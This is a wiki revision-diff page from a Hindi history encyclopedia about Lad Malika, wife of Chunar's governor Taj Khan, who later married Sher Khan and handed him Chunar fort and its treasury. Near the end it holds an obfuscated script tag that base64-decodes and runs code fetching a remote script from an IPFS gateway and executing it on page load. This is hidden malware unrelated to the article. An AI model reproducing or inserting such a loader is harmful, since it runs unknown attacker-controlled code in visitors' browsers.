Difference between revisions of "लाड मलिका"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:इतिहास कोश (को हटा दिया गया हैं।))
Line 1: Line 1:
*[[चुनार क़िला|चुनार]] के हाक़िम ताज़ ख़ाँ की पत्नी थी।  
+
*लाड मलिका [[चुनार क़िला|चुनार]] के हाक़िम ताज़ ख़ाँ की पत्नी थी।  
 
*1528 ई. में उसके सौतेले पुत्र ने उसके पति की हत्या कर दी।  
 
*1528 ई. में उसके सौतेले पुत्र ने उसके पति की हत्या कर दी।  
 
*विधवा होने के बाद उसने शेर ख़ाँ (बाद में [[शेरशाह]]) से शादी कर ली और न केवल चुनार के क़िले पर, बल्कि उसके ख़ज़ाने पर भी उसका क़ब्ज़ा करवा दिया।  
 
*विधवा होने के बाद उसने शेर ख़ाँ (बाद में [[शेरशाह]]) से शादी कर ली और न केवल चुनार के क़िले पर, बल्कि उसके ख़ज़ाने पर भी उसका क़ब्ज़ा करवा दिया।  

Revision as of 05:02, 4 March 2011

  • lad malika chunar ke haqim taz khaan ki patni thi.
  • 1528 ee. mean usake sautele putr ne usake pati ki hatya kar di.
  • vidhava hone ke bad usane sher khaan (bad mean sherashah) se shadi kar li aur n keval chunar ke qile par, balki usake khazane par bhi usaka qabza karava diya.
  • is prakar usane sherashah ko usake vijay rath par agrasar kiya, jisake phalasvaroop 1540 ee. mean vah dilli ka badashah ban gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh